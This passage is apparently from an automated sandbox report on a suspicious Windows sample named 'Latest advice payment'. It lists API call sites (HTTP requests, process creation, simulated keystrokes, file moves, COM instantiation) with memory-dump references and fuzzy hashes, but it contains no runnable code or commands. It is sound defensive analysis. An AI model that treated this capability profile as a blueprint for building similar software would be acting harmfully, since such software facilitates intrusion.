  • Part of subcall function 005BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 005BAABC
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 005B90FD
• GetDlgCtrlID.USER32 ref: 005B9108
• GetParent.USER32 ref: 005B9124
• SendMessageW.USER32(00000000,?,00000111,?), ref: 005B9127
• GetDlgCtrlID.USER32(?), ref: 005B9130
• GetParent.USER32(?), ref: 005B914C
• SendMessageW.USER32(00000000,?,?,00000111), ref: 005B914F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
• Opcode ID: 7efdccf813be5020709e0e2d6cbb0a669172f8a41c80601d14cbc448a4be67fd
• Instruction ID: 668a7c8cb2082ce9c92d85fe51f0662717fb0a1ef2e26e2ffc593da9e901060d
• Opcode Fuzzy Hash: 7efdccf813be5020709e0e2d6cbb0a669172f8a41c80601d14cbc448a4be67fd
• Instruction Fuzzy Hash: 95210774A00149BBDF04ABA4CC89EFEBF74FF98300F104059FA51972A2DB755819EB20
APIs
• GetParent.USER32 ref: 005B916F
• GetClassNameW.USER32(00000000,?,00000100), ref: 005B9184
• _wcscmp.LIBCMT ref: 005B9196
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 005B9211
Strings
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-3381328864
• Opcode ID: 91a7a4390dc703ac88ca47b982a9009e566f83ff95cfd43b9ef975c56c2e468f
• Instruction ID: 2c4c06a930305dd039b1bff2a92e4648c7b3885a48692e6d3dc213f273df2132
• Opcode Fuzzy Hash: 91a7a4390dc703ac88ca47b982a9009e566f83ff95cfd43b9ef975c56c2e468f
• Instruction Fuzzy Hash: 07110A3E68C307BAFA153624EC0ADF77F9DBB55720F200466FE00A40D1EE6178556A54
APIs
• SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 005C7A6C
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: ArraySafeVartype
• String ID:
• API String ID: 1725837607-0
• Opcode ID: 90b41ef2ff48aa4955663b4a39ec788a21e02068af5b7a2d11cdd91d11e668cb
• Instruction ID: 2496f82eb122fe64e78f088a5f7a9a7c0940c57a591e050b6897b86faa054b44
• Opcode Fuzzy Hash: 90b41ef2ff48aa4955663b4a39ec788a21e02068af5b7a2d11cdd91d11e668cb
• Instruction Fuzzy Hash: 8DB1697190420A9FDB00DFE4C885BBEBBB8FF49321F204429E941AB691D734AD45DF90
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0056FAA6
• OleUninitialize.OLE32(?,00000000), ref: 0056FB45
• UnregisterHotKey.USER32(?), ref: 0056FC9C
• DestroyWindow.USER32(?), ref: 005A45D6
• FreeLibrary.KERNEL32(?), ref: 005A463B
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 005A4668
Strings
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: f0e40edf7a27a674db9b85cb9ee8760ec2dd6e3485b43cb9caf95d0dda84e5ea
• Instruction ID: 1c00bae4521230657c27ac7d2f0101a74d183a5856446f7e7b9c16c59da8859e
• Opcode Fuzzy Hash: f0e40edf7a27a674db9b85cb9ee8760ec2dd6e3485b43cb9caf95d0dda84e5ea
• Instruction Fuzzy Hash: 0DA18E30701212CFDB29EF54D599A6DFB64BF96700F1446ADE80AAB261DB30ED16CF50
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: ,,_$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2862541840-3331404921
• Opcode ID: 8eb00b87b386b451ccbbbdb7071d0fdb1ab9216672de2af8dcae83ffecb96618
• Instruction ID: dc8e4e246d61fc28a10c88bf9aacaac003c6af6d862930c4613bff04927a5077
• Opcode Fuzzy Hash: 8eb00b87b386b451ccbbbdb7071d0fdb1ab9216672de2af8dcae83ffecb96618
• Instruction Fuzzy Hash: E1915D71A00219ABDF24DFA9C848FAEBFB8FF85714F10855BE515AB280D7709945CBA0
APIs
• EnumChildWindows.USER32(?,005BA439), ref: 005BA377
Strings
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
• Opcode ID: c8c2306038afeb5df2d1a1be3d64b83123cc67b25232afdb75b2247de23b0105
• Instruction ID: 9e0abc10f6d8dc97bd645b1a9d368ff480d434a269d15316917d656d6bddaa4c
• Opcode Fuzzy Hash: c8c2306038afeb5df2d1a1be3d64b83123cc67b25232afdb75b2247de23b0105
• Instruction Fuzzy Hash: 0D91C630A04606ABDB08EFA4C486BEEFFB5FF44300F548519E859A7281DF317999CB91
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00562EAE
  • Part of subcall function 00561DB3: GetClientRect.USER32(?,?), ref: 00561DDC
  • Part of subcall function 00561DB3: GetWindowRect.USER32(?,?), ref: 00561E1D
  • Part of subcall function 00561DB3: ScreenToClient.USER32(?,?), ref: 00561E45
• GetDC.USER32 ref: 0059CD32
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0059CD45
• SelectObject.GDI32(00000000,00000000), ref: 0059CD53
• SelectObject.GDI32(00000000,00000000), ref: 0059CD68
• ReleaseDC.USER32(?,00000000), ref: 0059CD70
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0059CDFB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: 02bf063d7cb89f39df1b673bbfc582f25daece05d6879f93ba050c6635bb88a3
• Instruction ID: 7706f9988047f166b9809840f218af0a8325f6b8a1b4d7a7f29e30f647f0ae6f
• Opcode Fuzzy Hash: 02bf063d7cb89f39df1b673bbfc582f25daece05d6879f93ba050c6635bb88a3
• Instruction Fuzzy Hash: B671C031500645DFCF258F64C884ABA7FBAFF49360F14467AED5A9B2A6C7318C41DB60
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005D1A50
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 005D1A7C
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 005D1ABE
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 005D1AD3
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005D1AE0
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 005D1B10
• InternetCloseHandle.WININET(00000000), ref: 005D1B57
  • Part of subcall function 005D2483: GetLastError.KERNEL32(?,?,005D1817,00000000,00000000,00000001), ref: 005D2498
  • Part of subcall function 005D2483: SetEvent.KERNEL32(?,?,005D1817,00000000,00000000,00000001), ref: 005D24AD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
• String ID:
• API String ID: 2603140658-3916222277
• Opcode ID: bf5f2f0b8e7743abb24a636826ea27b171948523d4af64252219d27fbf86bbdf
• Instruction ID: 28382e930f5cb5b2696dc5cb763c43eeadc3166fe68e8672fd9a1ad408627f7c
• Opcode Fuzzy Hash: bf5f2f0b8e7743abb24a636826ea27b171948523d4af64252219d27fbf86bbdf
• Instruction Fuzzy Hash: C9419DB1501619BFEB258F54CC89FBA7BACFF58354F00412BFD059A241EB709E449BA4
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,005EF910), ref: 005D8D28
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,005EF910), ref: 005D8D5C
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 005D8ED6
• SysFreeString.OLEAUT32(?), ref: 005D8F00
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
• Opcode ID: 78fb07a1fa893fdaa12f2903db6984cc9855c0c145429a9cca3d53198ce27aef
• Instruction ID: 9267d6d770b701b9adfb284aa94778fb47759b48559a17fca95579474f921f3a
• Opcode Fuzzy Hash: 78fb07a1fa893fdaa12f2903db6984cc9855c0c145429a9cca3d53198ce27aef
• Instruction Fuzzy Hash: 44F11B71A00209EFDF14DF98C888EAEBBB9FF89314F10855AF515AB251DB31AE45CB50
APIs
• _memset.LIBCMT ref: 005DF6B5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 005DF848
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 005DF86C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005DF8AC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005DF8CE
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 005DFA4A
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 005DFA7C
• CloseHandle.KERNEL32(?), ref: 005DFAAB
• CloseHandle.KERNEL32(?), ref: 005DFB22
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
• Opcode ID: 8eb3241d2221d9f2b1e1f7bcad3fd5dc8ae29530ea58dfa403947d88032a814b
• Instruction ID: a625ae0a458855c52e1f2f3af0f62478df9a74c5a77829f115b9852309fb493b
• Opcode Fuzzy Hash: 8eb3241d2221d9f2b1e1f7bcad3fd5dc8ae29530ea58dfa403947d88032a814b
• Instruction Fuzzy Hash: 08E18F316042419FC724EF28D895B6ABFE5BF85314F14896EF89A9B3A1CB30DC45CB52
APIs
  • Part of subcall function 005C466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005C3697,?), ref: 005C468B
  • Part of subcall function 005C466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005C3697,?), ref: 005C46A4
  • Part of subcall function 005C4A31: GetFileAttributesW.KERNEL32(?,005C370B), ref: 005C4A32
• lstrcmpiW.KERNEL32(?,?), ref: 005C4D40
• _wcscmp.LIBCMT ref: 005C4D5A
• MoveFileW.KERNEL32(?,?), ref: 005C4D75
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
• API String ID: 793581249-0
• Opcode ID: 09eb7bf948701bb799f67ad7ef4810da5ce42ad4ea4c310d1cd9b92f7a83e3be
• Instruction ID: abd79333681076bad34aee86793a7c1b4a85b11de2b00b74f8b2144e0d8c9ca5
• Opcode Fuzzy Hash: 09eb7bf948701bb799f67ad7ef4810da5ce42ad4ea4c310d1cd9b92f7a83e3be
• Instruction Fuzzy Hash: 245131B24083859FC724EBA4D895EDB7BECBF84350F40092EB585D3151EF34A688CB56
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 005E86FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: a77ee80a6e5b0e39cb4336889b148e9c8a2ed09e5f08649ba6e4323bf65f0418
                                                            • Instruction ID: 37da5ba4b5242d17c694512682f033c428ce35a64bc7ef0beb45bf2e9a2cdb1a
                                                            • Opcode Fuzzy Hash: a77ee80a6e5b0e39cb4336889b148e9c8a2ed09e5f08649ba6e4323bf65f0418
                                                            • Instruction Fuzzy Hash: 5751A1305042D5BEEB289B268C89FBD3FA5FB15310F604915F9D9EA1E1CF72A980DB40
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0059C2F7
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0059C319
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0059C331
                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0059C34F
                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0059C370
                                                            • DestroyIcon.USER32(00000000), ref: 0059C37F
                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0059C39C
                                                            • DestroyIcon.USER32(?), ref: 0059C3AB
                                                              • Part of subcall function 005EA4AF: DeleteObject.GDI32(00000000), ref: 005EA4E8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                            • String ID:
                                                            • API String ID: 2819616528-0
                                                            • Opcode ID: 2d3000c68c2b50397a4de4820f43249f38a4fd8421ce11b99223ad51d72fa711
                                                            • Instruction ID: 848a45d190042da727b390c1d6a5d7409897572bc2afa21f50bf71aaf476f200
                                                            • Opcode Fuzzy Hash: 2d3000c68c2b50397a4de4820f43249f38a4fd8421ce11b99223ad51d72fa711
                                                            • Instruction Fuzzy Hash: 02515C74A00A05AFDF24DF64DC85FAA7FB5FB58710F104928F952972A0DB70AD90DB50
                                                            APIs
                                                              • Part of subcall function 005BA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 005BA84C
                                                              • Part of subcall function 005BA82C: GetCurrentThreadId.KERNEL32 ref: 005BA853
                                                              • Part of subcall function 005BA82C: AttachThreadInput.USER32(00000000,?,005B9683,?,00000001), ref: 005BA85A
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 005B968E
                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 005B96AB
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 005B96AE
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 005B96B7
                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 005B96D5
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 005B96D8
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 005B96E1
                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 005B96F8
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 005B96FB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                            • String ID:
                                                            • API String ID: 2014098862-0
                                                            • Opcode ID: 34c8134c5d02d6f9c68ffa6d5124dc4f0ef630ef6d4be9f75ff0b20f5e666109
                                                            • Instruction ID: 169d28424a2ae9a54806e2f87738c1cbcb1641c01b8a16b41d4c712ea63e72ed
                                                            • Opcode Fuzzy Hash: 34c8134c5d02d6f9c68ffa6d5124dc4f0ef630ef6d4be9f75ff0b20f5e666109
                                                            • Instruction Fuzzy Hash: 59117CB1950658BBF6106F60DC89EAA7F2DEB9D751F110425F284AF0A0CDB26C50EBA4
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,005B853C,00000B00,?,?), ref: 005B892A
                                                            • HeapAlloc.KERNEL32(00000000,?,005B853C,00000B00,?,?), ref: 005B8931
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,005B853C,00000B00,?,?), ref: 005B8946
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,005B853C,00000B00,?,?), ref: 005B894E
                                                            • DuplicateHandle.KERNEL32(00000000,?,005B853C,00000B00,?,?), ref: 005B8951
                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,005B853C,00000B00,?,?), ref: 005B8961
                                                            • GetCurrentProcess.KERNEL32(005B853C,00000000,?,005B853C,00000B00,?,?), ref: 005B8969
                                                            • DuplicateHandle.KERNEL32(00000000,?,005B853C,00000B00,?,?), ref: 005B896C
                                                            • CreateThread.KERNEL32(00000000,00000000,005B8992,00000000,00000000,00000000), ref: 005B8986
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: 6515f017d2553479bd341b4f6dddba6a53f57b9528c2005f7eb52ba38b64dcd3
                                                            • Instruction ID: 169ab13b7df622d89957d8a3e100d07183e07f3b9b34941d5fdf02f674773eb4
                                                            • Opcode Fuzzy Hash: 6515f017d2553479bd341b4f6dddba6a53f57b9528c2005f7eb52ba38b64dcd3
                                                            • Instruction Fuzzy Hash: D701BBB5240348FFE714ABA5DC8DF6B3BACEB99711F418421FA45DF1A1CA709804DB20
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                            • API String ID: 0-572801152
                                                            • Opcode ID: 6ea62ac85d7d3a38852feef5eb7600305ba1025a3e300373eece0391a333d2eb
                                                            • Instruction ID: b553ab94f655e62bb20dd45a2399739d529ba057ac5fcccd26e8ff62d88d8c82
                                                            • Opcode Fuzzy Hash: 6ea62ac85d7d3a38852feef5eb7600305ba1025a3e300373eece0391a333d2eb
                                                            • Instruction Fuzzy Hash: DAC18571A0021A9FDF20DF98D884AEEBBF9FB48314F15446BE905A7391E7709D45CB90
                                                            APIs
                                                              • Part of subcall function 005B710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,005B7044,80070057,?,?,?,005B7455), ref: 005B7127
                                                              • Part of subcall function 005B710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,005B7044,80070057,?,?), ref: 005B7142
                                                              • Part of subcall function 005B710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,005B7044,80070057,?,?), ref: 005B7150
                                                              • Part of subcall function 005B710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,005B7044,80070057,?), ref: 005B7160
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 005D9806
                                                            • _memset.LIBCMT ref: 005D9813
                                                            • _memset.LIBCMT ref: 005D9956
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 005D9982
                                                            • CoTaskMemFree.OLE32(?), ref: 005D998D
